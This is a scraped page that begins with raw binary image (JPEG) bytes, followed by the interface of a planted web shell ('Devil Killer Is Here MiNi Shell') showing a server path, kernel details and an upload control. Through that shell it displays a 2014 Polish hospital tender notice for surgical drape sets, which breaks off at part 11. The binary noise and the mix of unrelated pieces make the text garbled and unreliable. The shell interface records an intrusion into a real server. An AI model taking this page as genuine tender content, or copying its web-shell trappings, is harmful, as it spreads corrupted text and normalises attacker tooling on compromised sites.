JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140410/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140410/123150-N-2014.html

<p class="kh_header"><b>Suwałki: Dostawa zestawów zabiegowych dla Szpitala Wojewódzkiego im. dr. Ludwika Rydygiera w Suwałkach</b><br>
<b>Numer ogłoszenia: 123150 - 2014; data zamieszczenia: 10.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Wojewódzki im. dr. Ludwika Rydygiera w Suwałkach , ul. Szpitalna 60, 16-400 Suwałki, woj. podlaskie, tel. 087 5629582, 5629462, 5629595, faks 087 5629594.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.suwalki.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.szpital.suwalki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa zestawów zabiegowych dla Szpitala Wojewódzkiego im. dr. Ludwika Rydygiera w Suwałkach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa zestawów zabiegowych dla Szpitala Wojewódzkiego im. dr. Ludwika Rydygiera w Suwałkach wg ilości i asortymencie określonym w formularzu asortymentowo - cenowym..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 27.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.07.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> w przedmiotowym postępowaniu nie wymaga się wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Oświadczenie o przedstawieniu próbek oferowanych wyrobów na każde wezwanie zamawiającego.
2. Oświadczenie że oferowane wyroby medyczne zostały dopuszczone do obrotu zgodne z ustawą o wyrobach medycznych z dnia 20 maja 2010r. ( Dz.U.10.107.679 ), w przypadku podmiotów wprowadzających na teren Rzeczypospolitej Polskiej wyroby medyczne przeznaczone do używania na tym terytorium wymaga się dokumentu powiadomienia Presa Urzędu o tym fakcie (zgodnie z art. 58 ust. 3 ) ustawy o wyrobach medycznych z dnia 20 maja 2012r. ( Dz.U.10.107.679) - dotyczy pozycji 9 - 58 - Zamawiający zastrzega sobie możliwość wezwania wykonawców na etapie oceny ofert do przedstawienia powyższych dokumentów.;

W celu potwierdzenia, że oferowane wyroby są zgodne z wymaganiami SIWZ oraz wymogami normy PN EN 13795 1-3 do oferty należy dołączyć: arkusze danych technicznych włókniny z której wykonane są wyroby;

formularz asortymentowo -cenowy</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wzór oferty na dostawy;

Pełnomocnictwo do podpisania oferty. Pełnomocnictwo należy załączyć do oferty tylko w przypadku, gdy oferta jest podpisania przez osobę nie figurującą w rejestrze lub wpisie do ewidencji działalności gospodarczej. Brak podpisu na ofercie lub podpisanie oferty przez osobę do tego nieupoważnioną spowoduje konieczność odrzucenia oferty. W przypadku składnia oferty przez podmioty występujące wspólnie, dokument ustanawiający Pełnomocnika do reprezentowania ich  w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego jeżeli oferta nie jest podpisana przez wszystkich Wykonawców występujących wspólnie. Postępowanie 
o udzielenie zamówienia publicznego nie jest postępowaniem sądowym, stwierdzić należy, że złożenie dokumentu pełnomocnictwa lub prokury albo jego odpisu, wypisu lub kopii przez pełnomocnika wykonawcy w postępowaniu o udzielenie zamówienia publicznego nie podlega opłacie skarbowej.;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający działając w oparciu o art. 144 ust 1 ustawy Prawo zamówień publicznych określa następujące okoliczności, które mogą powodować konieczność wprowadzenia zmian w treści zawartej umowy w stosunku do treści złożonej oferty:
a) wydłużenia terminu realizacji umowy, Zamawiający dopuszcza przedłużenie terminu obowiązywania umowy w przypadku niewyczerpania kwoty określonej w § 1 ust. 4;

b)   zamiany poszczególnego asortymentu, będącego przedmiotem umowy i wyszczególnionego w Załączniku nr 1 do niniejszej umowy, z chwilą zaprzestania lub wstrzymania jego produkcji, a o czym Wykonawca nie mógł wiedzieć z chwilą zawarcia niniejszej umowy, na tzw. zamiennik pod warunkiem, że spełni on wszystkie wymogi Zamawiającego w tym również cenę jednostkową netto i brutto;

c)   Zamawiający zastrzega sobie możliwość zmiany ilości poszczególnego asortymentu, będącego przedmiotem umowy i wyszczególnionego w Załączniku nr 1 do niniejszej umowy w zakresie łącznej wartości umowy, o której mowa w § 1 ust. 4 projektu umowy.

d)   numeru katalogowego produktu lub nazwy własnej produktu, zmianę sposobu konfekcjonowania - w przypadku, gdy wprowadzony zostanie na rynek produkt zmodyfikowany przy czym nie wpłynie to na zwiększenie wartości pakietu i będzie to produkt o parametrach nie gorszych od produktu objętego umową;  wprowadzony zostanie do sprzedaży przez Wykonawcę produkt zmodyfikowany lub udoskonalony
e)    zmiana ceny w przypadku zmiany przepisów prawa podatkowego w okresie obowiązywania umowy dotyczących stawek VAT, przy czym zmiana nastąpi w wartości brutto, natomiast wartość netto pozostaje bez zmian.

Powyższe zmiany nie mogą skutkować zmianą ceny jednostkowej, wartości umowy i nie mogą być niekorzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.suwalki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedzibie Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.04.2014 godzina 09:30, miejsce: w siedzibie Zamawiającego pokój nr 7, Sekretariat Szpitala Wojewódzkiego im. dr. Ludwika Rydygiera w Suwałkach.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw do cesarskiego cięcia: serweta chirurgiczna w kształcie litery T do cięcia cesarskiego o wymiarach 175/250x300 cm posiadająca otwór o wymiarach 38x32 cm wypełniony folią chirurgiczną, posiadająca zintegrowany, okalający duży worek do przechwytywania płynów o wymiarach 100x80 cm wyposażony w sztywnik, podłączenie ssaka i organizatory przewodów- 1 szt.; serweta - owinięcie noworodka 90x120 cm- 1 szt.; serweta chirurgiczna z taśmą samoprzylepną 50x50 cm- 1szt.; taśma samoprzylepna 9x49 cm- 1 szt.; ręczniki chłonne 18x25 cm- 4 szt.; 79x145 cm- 1szt.; serweta na stolik - (owinięcie zestawu) 150x190 cm- 1 szt.
Zestaw musi spełniać wymagania wysokie wg normy PN EN 13795 1-3 przy czym wytrzymałość na wypychanie/rozrywanie w strefie krytycznej na poziomie min.100 kPa Materiał podstawowy serwety głównej składający się min. z  2 warstw ( folia PE oraz warstwa chłonna ) o łącznej gramaturze min. 60 g/m2 Dopuszcza się tolerancję rozmiarów serwet + 5%, tolerancja rozmiaru w przypadku otworów + 2 cm, tolerancja w przypadku pozostałych elementów zestawu + 3 cm
szt. 200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw do cystoskopii; serweta chirurgiczna do cystoskopii o wymiarach 100x150 cm, posiadająca eliptyczny otwór w części kroczowej o wymiarach 15x20 cm, otoczony warstwą chłonną o wymiarach 37,5x45 cm, osłony na kończynę wyposażone w taśmy samoprzylepne 73x118 cm- 2 szt., taśmy samoprzylepne 9x49 cm- 2 szt., serweta na stolik - (owinięcie zestawu) 100x150 cm.- 1 szt. Zestaw musi spełniać wymagania normy PN En 13795, serweta główna wykonana z chłonnego lamiantu min. dwuwarstwowego na całej powierzchni serwety o gramaturze min. 60 g/m2 Dopuszcza się tolerancję rozmiarów serwet + 5%, tolerancja rozmiaru w przypadku otworów + 2 cm, tolerancja w przypadku pozostałych elementów zestawu + 3 cm
szt. 100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw do zabiegów urologicznych: serweta chirurgiczna do przezcewkowych zabiegów urologicznych o wymiarach 175/270x180 cm zintegrowana z nogawicami, posiadająca otwór samoprzylepny w okolicy jamy brzusznej (? 8 cm), otwór na prącie (? 5 cm) i osłoną na palec do badania per rectum. Serweta posiada worek do przechwytywania płynów z sitem i podłączeniem do drenu- 1 szt., ręcznik chłonny 18x25 cm- 1 szt., samoprzylepny organizator przewodów 9x18 cm- 1 szt., serweta na stolik - (owinięcie zestawu) 150x190 cm- 1 szt.
Zestaw musi spełniać wymagania wysokie normy PN EN 13795, serweta główna wykonana z laminatu dwuwarstwowego o gramaturze min. 60 g/m2
Dopuszcza się tolerancję rozmiarów serwet + 5%, tolerancja rozmiaru w przypadku otworów + 2 cm, tolerancja w przypadku pozostałych elementów zestawu + 3 cm
szt. 60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Serweta chirurgiczna pod pośladki, dwuwarstwowa, nieprzemakalna o wym. 75x100 cm. Dopuszcza się tolerancję rozmiarów serwet + 5%,
szt. 150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Serweta zabiegowa z włókniny SMS o wym. 50x60 cm. Serweta wykonana z włókniny SMS, hydrofobowo wykończonej o gramaturze mon. 35 g/m2
Dopuszcza się tolerancję rozmiarów serwet + 5%,
szt. 50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylna osłona na kończynę o wymiarach 75x120, 2 szt w opakowaniu, osłona wykonana z lamiantu chłonnego o gramaturze min. 60 g/m. . Osłony na kończynę spełniające wymagania wysokie normy PN EN 13795 1-3 przy jednoczesnej nieprzemakalności min. 140 cm H2O i wytrzymałości na wypychanie/rozerwanie min. 65 kPa Dopuszcza się tolerancję rozmiarów osłon + 5%,
szt. 100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylny pokrowiec na ramię C wykonany z przezroczystej folii PE, zakończony elastyczną gumką. W zestawie znajduje się dodatkowa gumka do mocowania o wymiarach 100x220 cm Dopuszcza się tolerancję rozmiarów + 5%,
szt. 300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylna osłona na stolik Mayo o wym. 79x145 cm wykonana z mocnej, nieprzeźroczystej folii PE o grubości 60 mikronów, warstwa chłonna stolika o wymiarach 65 x 85 cm Osłona na stolik Mayo musi spełniać wymagania wysokie normy PN EN 13795 Dopuszcza się tolerancję rozmiarów serwet +/- 5%,
szt.50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw uniwersalny do krótkich zabiegów: serweta górna z taśmą samoprzylepną 240x150 cm- 1 szt.; serwety boczne z taśmą samoprzylepną 90x75 cm- 2 szt.; serweta dolna z taśmą samoprzylepną 175x175 cm- 1 szt.; taśma samoprzylepna 9x49 cm- 1 szt.; ręczniki chłonne 18x25 cm- 4 szt.; osłona na stolik MAYO 79x145 cm- 1 szt.; serweta na stolik - (owinięcie zestawu) 140x190 cm- 1 szt.
Zestaw musi spełniać wymagania standardowe wg normy PN EN 13795 1-3, przy czym nieprzemakalność serwet podstawowych w strefie krytycznej na poziomie min. 100 cm H2O przy jednoczesnej wytrzymałości na wypychanie/rozrywanie w strefie krytycznej na poziomie min. 60 kPa
Materiał podstawowy obłożenia składający się z min. 2 warstw w strefie krytycznej: warstwy chłonnej o gramaturze min. 23 g/m2 oraz folii PE 40-45 mikronów
Dopuszcza się tolerancję rozmiarów serwet + 5%, tolerancja w przypadku pozostałych elementów zestawu + 3 cm
szt.100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> 10.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Folia operacyjna 30x27 cm (+/- 3 cm) wykonana z cienkiej poliuretanowej folii o grubości 23-25 mikronów i współczynniku przepuszczalności >700 MVTR, wysoka przepuszczalność pary wodnej gwarantuje bardzo dobre przyleganie nawet podczas długich zabiegów, antystatyczna, niepalna, nie powodująca refleksów. Łatwa w aplikacji dzięki fingerliftom odrywanym po przyklejeniu
szt. 200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> 11.</p>
